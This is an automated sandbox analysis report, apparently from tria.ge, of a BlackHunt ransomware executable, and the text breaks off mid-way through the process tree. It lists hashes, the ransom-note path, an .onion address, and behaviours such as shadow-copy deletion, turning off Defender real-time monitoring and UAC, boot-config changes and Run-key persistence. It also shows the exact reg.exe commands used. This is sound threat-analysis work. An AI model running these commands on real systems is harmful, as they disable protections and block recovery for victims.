Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
157s -
max time network
172s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:28
Static task
static1
Behavioral task
behavioral1
Sample
a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe
Resource
win10v2004-20231215-en
General
-
Target
a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe
-
Size
707KB
-
MD5
46756014054d0dee5c8854c051514066
-
SHA1
ade9e1cf6c5e3aba2297fcdadf52b8ced059d304
-
SHA256
a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c
-
SHA512
0234fd6dbf1f4b93a5d6a203ea8d682df514c22d6e21fcb1518931e8ec07adef00244737f31b251330b24c9793300dd753217d3e592cd2d924ef94f66f14a054
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1D8tvnh:6uaTmkZJ+naie5OTamgEoKxLW6Zh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5160 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6096 bcdedit.exe 2988 bcdedit.exe -
Renames multiple (404) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3052 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\R: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\U: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\K: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\V: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\M: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\N: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\E: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\I: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\H: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\S: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\Z: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\T: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\O: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\A: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\L: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\J: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\Q: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\Y: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\P: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\G: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\X: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened (read-only) \??\W: a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\History.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\dotnet\swidtag\Microsoft Windows Desktop Runtime - 8.0.0 (x64).swidtag a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfxswt.jar a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\java.security a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_ReadMe.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxml2.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\santuario.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\7z.sfx a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\currency.data a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xerces.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\joni.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngcc.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\psfontj2d.properties a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\readme.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\cldrdata.jar a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\dotnet\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\dotnet\shared\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.cpl a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_ReadMe.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\calendars.properties a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\lcms.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_ReadMe.hta a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\README.html a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\PYCC.pf a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_ReadMe.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngdatatype.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages.properties a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightItalic.ttf a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jvisualvm.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\freebxml.md a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\GRAY.pf a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3692 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3772 vssadmin.exe 5576 vssadmin.exe 5560 vssadmin.exe 5508 vssadmin.exe 212 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Token: SeRestorePrivilege 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Token: SeBackupPrivilege 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Token: SeTakeOwnershipPrivilege 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Token: SeAuditPrivilege 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Token: SeSecurityPrivilege 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Token: SeIncBasePriorityPrivilege 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Token: SeBackupPrivilege 5908 vssvc.exe Token: SeRestorePrivilege 5908 vssvc.exe Token: SeAuditPrivilege 5908 vssvc.exe Token: SeBackupPrivilege 3964 wbengine.exe Token: SeRestorePrivilege 3964 wbengine.exe Token: SeSecurityPrivilege 3964 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2148 wrote to memory of 1584 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 92 PID 2148 wrote to memory of 1584 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 92 PID 2148 wrote to memory of 1412 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 95 PID 2148 wrote to memory of 1412 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 95 PID 2148 wrote to memory of 2732 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 179 PID 2148 wrote to memory of 2732 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 179 PID 2148 wrote to memory of 1496 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 191 PID 2148 wrote to memory of 1496 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 191 PID 2148 wrote to memory of 4736 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 98 PID 2148 wrote to memory of 4736 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 98 PID 2148 wrote to memory of 2004 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 102 PID 2148 wrote to memory of 2004 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 102 PID 2148 wrote to memory of 3080 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 104 PID 2148 wrote to memory of 3080 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 104 PID 2148 wrote to memory of 2440 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 103 PID 2148 wrote to memory of 2440 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 103 PID 2148 wrote to memory of 4836 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 108 PID 2148 wrote to memory of 4836 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 108 PID 2148 wrote to memory of 2964 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 109 PID 2148 wrote to memory of 2964 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 109 PID 1584 wrote to memory of 4280 1584 cmd.exe 169 PID 1584 wrote to memory of 4280 1584 cmd.exe 169 PID 4736 wrote to memory of 4820 4736 cmd.exe 199 PID 4736 wrote to memory of 4820 4736 cmd.exe 199 PID 1412 wrote to memory of 3188 1412 cmd.exe 116 PID 1412 wrote to memory of 3188 1412 cmd.exe 116 PID 2732 wrote to memory of 4704 2732 cmd.exe 114 PID 2732 wrote to memory of 4704 2732 cmd.exe 114 PID 2148 wrote to memory of 1896 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 113 PID 2148 wrote to memory of 1896 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 113 PID 2148 wrote to memory of 3828 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 118 PID 2148 wrote to memory of 3828 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 118 PID 2148 wrote to memory of 628 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 121 PID 2148 wrote to memory of 628 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 121 PID 2148 wrote to memory of 3916 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 123 PID 2148 wrote to memory of 3916 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 123 PID 2148 wrote to memory of 3180 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 125 PID 2148 wrote to memory of 3180 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 125 PID 1496 wrote to memory of 4864 1496 Conhost.exe 128 PID 1496 wrote to memory of 4864 1496 Conhost.exe 128 PID 2148 wrote to memory of 1588 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 126 PID 2148 wrote to memory of 1588 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 126 PID 2148 wrote to memory of 3500 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 127 PID 2148 wrote to memory of 3500 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 127 PID 2148 wrote to memory of 3100 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 131 PID 2148 wrote to memory of 3100 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 131 PID 2148 wrote to memory of 3992 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 133 PID 2148 wrote to memory of 3992 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 133 PID 2148 wrote to memory of 4840 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 132 PID 2148 wrote to memory of 4840 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 132 PID 2148 wrote to memory of 2988 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 138 PID 2148 wrote to memory of 2988 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 138 PID 3080 wrote to memory of 2000 3080 cmd.exe 136 PID 3080 wrote to memory of 2000 3080 cmd.exe 136 PID 2148 wrote to memory of 4304 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 141 PID 2148 wrote to memory of 4304 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 141 PID 2148 wrote to memory of 4188 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 140 PID 2148 wrote to memory of 4188 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 140 PID 2004 wrote to memory of 5100 2004 cmd.exe 142 PID 2004 wrote to memory of 5100 2004 cmd.exe 142 PID 2148 wrote to memory of 2804 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 146 PID 2148 wrote to memory of 2804 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 146 PID 2148 wrote to memory of 1428 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 145 PID 2148 wrote to memory of 1428 2148 a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe 145 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe"C:\Users\Admin\AppData\Local\Temp\a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
